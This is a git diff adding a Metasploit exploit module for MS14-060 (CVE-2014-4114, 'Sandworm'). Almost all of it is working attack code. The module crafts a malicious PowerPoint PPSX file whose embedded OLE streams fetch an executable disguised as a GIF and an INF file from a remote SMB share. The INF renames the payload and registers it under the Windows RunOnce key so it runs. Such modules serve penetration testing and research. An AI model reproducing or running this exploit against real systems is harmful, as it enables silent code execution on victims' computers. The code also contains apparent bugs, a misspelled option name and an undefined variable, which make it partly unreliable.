diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb new file mode 100644 index 0000000000..cf8f911c15 --- /dev/null +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -0,0 +1,213 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution", + 'Description' => %q{ + This module exploits a vulnerability Microsoft Windows from Vista SP2 to Windows 8, + including Windows Server 2008 and 2012. The vulnerability exists in the OLE package + magager, which allows to download and execute remote INF files silently. This module + triggers the vulnerability through a malicious PPSX file, as exploited in the wild on + October 2014. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Eduardo Prado', # Vulnerability discovery + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-4114'], + ['OSVDB', '113140'], + ['MSB', 'MS14-060'], + ['BID', '70419'], + ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'], + ['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/'] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + ['Windows 7 SP1 / Office 2010 SP1', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 14 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), + OptString.new('UNCPATH', [ true, 'The UNC path to use (Ex: \\\\192.168.1.1\\share)', '\\\\172.16.158.1\\public' ]) + ], self.class) + end + + def exploit + @unc = validate_unc + + if @unc.nil? + fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder") + end + + print_status("Creating the EXE payload...") + payload_name = "#{rand_text_alpha(4)}.gif" + p = generate_payload_exe + + print_status("Creating the INF file...") + inf_name = "#{rand_text_alpha(4)}.inf" + inf = inf_file(payload_name) + + print_status("Creating '#{datastore['FILENAME']}' file ...") + exe_stream = ole_exe(payload_name) + inf_stream = ole_inf(inf_name) + zip = zip_ppsx(exe_stream, inf_stream) + file_create(zip) + + payload_path = my_file_create(p, payload_name) + print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}") + + inf_path = my_file_create(inf, inf_name) + print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}") + end + + def validate_unc + if datastore['UNCPATH'] =~ /\\\\([^\\]+)\\([^\\]+)/ + unc = datastore['UNPATH'] + else + unc = nil + end + + unc + end + + def my_file_create(data, name) + ltype = "exploit.fileformat.#{self.shortname}" + path = store_local(ltype, nil, data, name) + + path + end + + def zip_ppsx(ole_exe, ole_inf) + zip_data = {} + data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') + + Dir["#{data_dir}/**/**"].each do |file| + unless File.directory?(file) + zip_data[file.sub(data_dir,'')] = File.read(file) + end + end + + #add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + zip_data[file.sub(data_dir,'')] = File.read(file) + + #put our own OLE streams + zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe + zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf + + #and lets create the file + ppsx = Rex::Zip::Archive.new + zip_data.each_pair do |k,v| + ppsx.add_file(k,v) + end + + ppsx.pack + end + + def ole_inf(file_name) + content = "EmbeddedStg2.txt\x00" + content << "#{@unc}\\#{file_name}\x00" + + data = [content.length].pack('V') + data << content + ole = create_ole("\x01OLE10Native", data) + + ole + end + + def ole_exe(file_name) + content = "EmbeddedStg1.txt\x00" + content << "#{@unc}\\#{file_name}\x00" + + data = [content.length].pack('V') + data << content + + ole = create_ole("\x01OLE10Native", data) + + ole + end + + def create_ole(stream_name, data) + ole_tmp = Rex::Quickfile.new('ole') + stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) + + stm = stg.create_stream(stream_name) + stm << data + stm.close + + directory.each_entry do |entry| + if entry.instance_variable_get(:@_ab) == 'Root Entry' + # 02260200-0000-0000-c000-000000000046 # Video clip + clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") + entry.instance_variable_set(:@_clsId, clsid) + end + end + + # write to disk + stg.close + + ole_contents = File.read(ole_tmp.path) + ole_tmp.close + ole_tmp.unlink + + ole_contents + end + + def inf_file(gif_name) + inf = <<-EOF +; 61883.INF +; Copyright (c) Microsoft Corporation. All rights reserved. + +[Version] +Signature = "$CHICAGO$" +Class=61883 +ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} +Provider=%Msft% +DriverVer=06/21/2006,6.1.7600.16385 + +[DestinationDirs] +DefaultDestDir = 1 + +[DefaultInstall] +RenFiles = RxRename +AddReg = RxStart + +[RxRename] +#{gif_name}.exe, #{gif_name} +[RxStart]# +HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe +EOF + + inf + end + +end +